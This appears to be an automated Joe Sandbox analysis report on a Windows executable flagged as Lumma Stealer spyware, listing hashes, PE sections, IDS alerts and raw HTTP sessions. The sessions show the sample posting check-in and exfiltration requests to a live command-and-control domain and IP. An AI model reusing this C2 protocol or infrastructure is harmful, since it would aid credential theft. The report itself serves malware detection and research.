https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3 | file.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://property-imper.sbs/apiH# | file.exe, 00000000.00000003.2283650767.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325456921.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2284187170.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2266053937.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325166462.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.mozilla.org/products/firefoxgro.all | file.exe, 00000000.00000003.2218893670.0000000005696000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.mozilla.or | file.exe, 00000000.00000003.2218789963.00000000055A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta | file.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://property-imper.sbs/4m | file.exe, 00000000.00000003.2172133728.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://property-imper.sbs:443/api.default-release/key4.dbPK | file.exe, 00000000.00000002.2327540061.0000000000F51000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
104.21.33.116 | property-imper.sbs | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1561463
Start date and time: 2024-11-23 13:56:40 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 32s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target file.exe, PID 4392 because there are no executed functions
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: file.exe
Behavior timeline (Time | Type | Description):
07:57:33 | API Interceptor | 8x Sleep call for process: file.exe modified
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    104.21.33.116file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                              Script.exeGet hashmaliciousLummaC StealerBrowse
                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        property-imper.sbsfile.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                        • 104.21.33.116
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.33.116
                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                        • 172.67.162.84
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.162.84
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.33.116
                                                                                        Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.162.84
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 104.21.33.116
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.162.84
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.162.84
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.162.84
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        CLOUDFLARENETUSfile.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                        • 104.21.33.116
                                                                                        psol.txt.ps1Get hashmaliciousLummaCBrowse
                                                                                        • 172.66.0.235
                                                                                        SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                                        • 104.21.88.250
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.33.116
                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.67.179
                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.20.178
                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                        • 172.67.162.84
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.162.84
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.33.116
                                                                                        b.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 104.21.88.250
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | Amadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 104.21.33.116
 | psol.txt.ps1 | malicious | LummaC | 104.21.33.116
 | SystemCoreHelper.dll | malicious | LummaC Stealer | 104.21.33.116
 | file.exe | malicious | Unknown | 104.21.33.116
 | Setup.exe | malicious | LummaC | 104.21.33.116
 | Setup.exe | malicious | LummaC | 104.21.33.116
 | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 104.21.33.116
 | file.exe | malicious | LummaC Stealer | 104.21.33.116
 | file.exe | malicious | Unknown | 104.21.33.116
 | b.exe | malicious | LummaC Stealer | 104.21.33.116

No context

No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.949133574214009
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'852'416 bytes
MD5: 44eb876d74e66bc5879d4ac1b636eaf1
SHA1: 614cc57507b70108e366e88e296db7c9c10f029e
SHA256: e8030c08981ae2cccfda22cbfd18ede9d1e1e51495ece00ccae6f8ebcad1c6f0
SHA512: ecc0a9a433a72be0b9195fea4dbf46e7f38cb8e6b3854838ffe52dd48162211086c5a4e0c09e8ae023701a7401ab205646d71485cf22558dc3289a38aeb82b92
SSDEEP: 24576:Fxb6hdlLUKaSMpKAt77VF1mlSD4/bYkHi0U4qoDZ+91DjIVU3IRty8gAq5U:30dlLUKBAt77NmZ/H2PV3X3Kgn
TLSH: F185330CADA3B9EBDBA227F5C5DDB90C2D510AD46F0EADE0792F17B7104326B7188491
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g.............................pI...........@...........................I......9....@.................................\...p..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x897000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b

Instruction (entry point)
jmp 00007F1740FA5C2Ah
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5805c | 0x70 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x57000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x581f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x56000 | 0x26200 | e9a881afee02a61de7d9201c039d504f | False | 0.9993084016393443 | data | 7.977505472489843 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x57000 | 0x2b0 | 0x200 | f88ccc15c78bbe7457275cabb99f6a2b | False | 0.794921875 | data | 6.0106497060946245 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x58000 | 0x1000 | 0x200 | c92ced077364b300efd06b14c70a61dc | False | 0.15625 | data | 1.1194718105633323 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x59000 | 0x2a2000 | 0x200 | 95607a2000bb0439d9a8562ccdcd1b00 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
prornizb | 0x2fb000 | 0x19b000 | 0x19a600 | 99d109745ce9c15b89c9e83ea688ae17 | False | 0.9944696162046909 | data | 7.953536728834796 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bkfftptq | 0x496000 | 0x1000 | 0x400 | c5b803c89b448bdfea155cb3c8261e32 | False | 0.7412109375 | data | 5.876294864003438 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x497000 | 0x3000 | 0x2200 | 8b6b3f6f53b519ccde4e41e8beff6f66 | False | 0.062270220588235295 | DOS executable (COM) | 0.7527862358768012 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x4951cc | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-23T13:57:33.993626+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49707 | 104.21.33.116 | 443 | TCP
2024-11-23T13:57:34.672720+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49707 | 104.21.33.116 | 443 | TCP
2024-11-23T13:57:34.672720+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49707 | 104.21.33.116 | 443 | TCP
2024-11-23T13:57:35.979561+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49708 | 104.21.33.116 | 443 | TCP
2024-11-23T13:57:36.672012+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.6 | 49708 | 104.21.33.116 | 443 | TCP
2024-11-23T13:57:36.672012+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49708 | 104.21.33.116 | 443 | TCP
2024-11-23T13:57:38.191607+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49710 | 104.21.33.116 | 443 | TCP
2024-11-23T13:57:40.446583+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49712 | 104.21.33.116 | 443 | TCP
2024-11-23T13:57:42.848399+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49713 | 104.21.33.116 | 443 | TCP
2024-11-23T13:57:45.639772+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49720 | 104.21.33.116 | 443 | TCP
2024-11-23T13:57:46.236579+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.6 | 49720 | 104.21.33.116 | 443 | TCP
2024-11-23T13:57:48.020217+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49729 | 104.21.33.116 | 443 | TCP
2024-11-23T13:57:52.147862+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49745 | 104.21.33.116 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                        Nov 23, 2024 13:57:44.366707087 CET49720443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:44.375222921 CET49720443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:44.375238895 CET44349720104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:45.639657021 CET44349720104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:45.639771938 CET49720443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:45.641479015 CET49720443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:45.641489983 CET44349720104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:45.641716957 CET44349720104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:45.645426989 CET49720443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:45.645545006 CET49720443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:45.645551920 CET44349720104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:46.236555099 CET44349720104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:46.236638069 CET44349720104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:46.236685991 CET49720443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:46.236825943 CET49720443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:46.236845016 CET44349720104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:46.791913033 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:46.791958094 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:46.792058945 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:46.792361975 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:46.792373896 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.020148993 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.020216942 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.021583080 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.021595001 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.021832943 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.028642893 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.029478073 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.029514074 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.029664040 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.029694080 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.029787064 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.029819965 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.029905081 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.029928923 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.030085087 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.030109882 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.030846119 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.030878067 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.075335026 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.075484991 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.075524092 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.119374990 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.119558096 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.119607925 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.119621038 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.163331032 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.163499117 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.163539886 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.207360029 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.207453966 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.251333952 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.270242929 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.270517111 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.270528078 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.398396015 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:51.654660940 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:51.654912949 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:51.654962063 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:51.655153036 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:51.655163050 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:51.666968107 CET49745443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:51.666996956 CET44349745104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:51.667068958 CET49745443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:51.667378902 CET49745443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:51.667393923 CET44349745104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:52.147861958 CET49745443192.168.2.6104.21.33.116
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 23, 2024 13:57:32.169172049 CET5302053192.168.2.61.1.1.1
                                                                                        Nov 23, 2024 13:57:32.634843111 CET53530201.1.1.1192.168.2.6
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Nov 23, 2024 13:57:32.169172049 CET192.168.2.61.1.1.10xcf63Standard query (0)property-imper.sbsA (IP address)IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Nov 23, 2024 13:57:32.634843111 CET1.1.1.1192.168.2.60xcf63No error (0)property-imper.sbs104.21.33.116A (IP address)IN (0x0001)false
                                                                                        Nov 23, 2024 13:57:32.634843111 CET1.1.1.1192.168.2.60xcf63No error (0)property-imper.sbs172.67.162.84A (IP address)IN (0x0001)false
                                                                                        • property-imper.sbs
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.649707104.21.33.1164434392C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-23 12:57:34 UTC265OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8
                                                                                        Host: property-imper.sbs
                                                                                        2024-11-23 12:57:34 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                        Data Ascii: act=life
                                                                                        2024-11-23 12:57:34 UTC1021INHTTP/1.1 200 OK
                                                                                        Date: Sat, 23 Nov 2024 12:57:34 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=8romjifedhob5ekuer8tofjptr; expires=Wed, 19-Mar-2025 06:44:13 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mfhuej3HLAcGDXoBYCsJ8n4DWEBIgABrboXWou2Xl3xpcQVrEq%2B6k0%2FngoAzR2gauxDHLtYLZ%2Bj7EiyqZSZwm6Aod85sLv%2Fr5sZ8tKayE%2BfN1%2FAMFZs0l6l%2Bh29FHFgkVhxKSKM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8e71536528507274-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1810&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1536842&cwnd=181&unsent_bytes=0&cid=26a2e6d64ff41ee4&ts=690&x=0"
                                                                                        2024-11-23 12:57:34 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                        Data Ascii: 2ok
                                                                                        2024-11-23 12:57:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49708 | 104.21.33.116 | 443 | 4392 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-23 12:57:35 UTC | 266 | OUT | POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 53
  Host: property-imper.sbs
2024-11-23 12:57:35 UTC | 53 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
  Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-11-23 12:57:36 UTC | 1015 | IN | HTTP/1.1 200 OK
  Date: Sat, 23 Nov 2024 12:57:36 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=d7elldc8eka4d40ott6sjud2l7; expires=Wed, 19-Mar-2025 06:44:15 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  cf-cache-status: DYNAMIC
  vary: accept-encoding
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CokwVoazkNINOiYk8Tp%2F1PA3KBByJ4ReiQL3CJgWvMyXXTpDMpKITkGrnT6LDVtJTG9QIHQAiOp%2FRQWTT%2Fg0WxVhJDNOXSle7dCvidClm3B4X20SIlTAc2KbhL3%2F2gmeP1EXZeo%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8e715371aa910f39-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1458&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=955&delivery_rate=1879021&cwnd=249&unsent_bytes=0&cid=fc11f5b363ae9a96&ts=697&x=0"
2024-11-23 12:57:36 UTC | 354 | IN | Data Raw: 31 64 38 33 0d 0a 4a 38 71 6f 71 4e 47 38 65 34 68 33 6a 6b 54 61 66 62 57 75 65 31 75 50 43 69 72 69 7a 41 73 4a 74 59 6c 70 43 6b 67 55 57 67 4a 63 36 4e 36 4b 36 34 68 58 71 67 54 72 5a 75 41 4a 78 39 73 65 64 36 31 72 54 73 44 32 62 57 6a 5a 2b 67 77 6d 61 6d 49 33 49 42 32 73 79 63 53 69 32 56 65 71 45 76 5a 6d 34 43 62 4f 6a 42 34 31 72 54 41 49 68 36 5a 70 61 4e 6e 72 43 47 45 6e 5a 44 5a 68 54 36 62 50 77 4c 54 66 48 2b 6b 62 34 79 47 2f 47 4e 54 45 46 54 4c 69 59 6b 66 41 34 43 6c 73 7a 36 74 54 4b 41 56 78 4c 6d 4e 71 71 39 76 44 38 38 46 58 38 31 58 72 4b 76 68 48 6c 38 38 65 4f 65 4e 73 54 6f 6d 6b 59 32 48 52 36 67 31 67 4f 48 30 38 61 6b 2b 6f 7a 4d 47 2b 31 67 76 6b 45 65 51 71 75 52 4c 55 6a 46 64 35 36 6e 41 49 32 4f 34 36 57 64 54 36 47
  Data Ascii: 1d83J8qoqNG8e4h3jkTafbWue1uPCirizAsJtYlpCkgUWgJc6N6K64hXqgTrZuAJx9sed61rTsD2bWjZ+gwmamI3IB2sycSi2VeqEvZm4CbOjB41rTAIh6ZpaNnrCGEnZDZhT6bPwLTfH+kb4yG/GNTEFTLiYkfA4Clsz6tTKAVxLmNqq9vD88FX81XrKvhHl88eOeNsTomkY2HR6g1gOH08ak+ozMG+1gvkEeQquRLUjFd56nAI2O46WdT6G
